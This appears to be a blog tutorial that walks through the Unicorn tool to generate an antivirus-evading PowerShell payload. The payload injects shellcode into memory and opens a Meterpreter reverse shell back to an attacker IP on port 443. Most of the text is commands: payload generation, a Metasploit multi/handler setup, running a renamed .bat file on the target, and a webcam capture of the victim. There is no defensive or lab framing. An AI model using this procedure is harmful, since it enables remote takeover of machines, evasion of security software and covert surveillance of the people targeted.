Unicorn – PowerShell Downgrade Attack Evade Anti-Virus

Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber’s powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18. https://www.trustedsec.com

Welcome back today we will talk about Powershell downgrade attacks using uniscan and inject shellcode straight into memory.

To start we will need to download Unicorn (Credits trustedsec).

https://github.com/trustedsec/unicorn

Now we have downloaded unicorn we now need to make the script executable.

# chmod +x unicorn.py

Now we can start unicorn using the following commands.

# python unicorn.py

Now unicorn is installed we now need to create a payload to create a payload we use command (replace LHOST to your own LHOST).

If you don’t know what you LHOST is you can use ifconfig to look up network information.

Create Payload:

# python unicorn.py windows/meterpreterpreter/reverse_tcp 192.168.43.49 443

Unicorn has now successfully generated our payload. We need to set a reverse handler up to manage connections between the attacker and target machine.

Open up a new command terminal and load up metasploit.

# msfconsole

Next we set our multi handler.

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

Now we need to set our LHOST.

set lhost 192.168.43.49

set lport 443

msf exploit(handler) > exploit

Now we need to send our payload to the target machine. Simply paste the powershell_attacks.txt command in any command prompt window or where you have the ability to call the powershell executable and it will give a shell back to you. This attack also supports windows/download_exec for a payload method instead of just Meterpreter payloads.

I will rename powershell_attack.bat and execute it on the target machine.

As you can see we have now established a reverse shell between the attacker and target machine.

we will now take a screen shot from the targets webcam.

meterpreter > webcam_snap

Metasploit is a powerful framework it includes lots of modules and exploits you may also like to read.

Useful Msfvenom and Metasploit Commands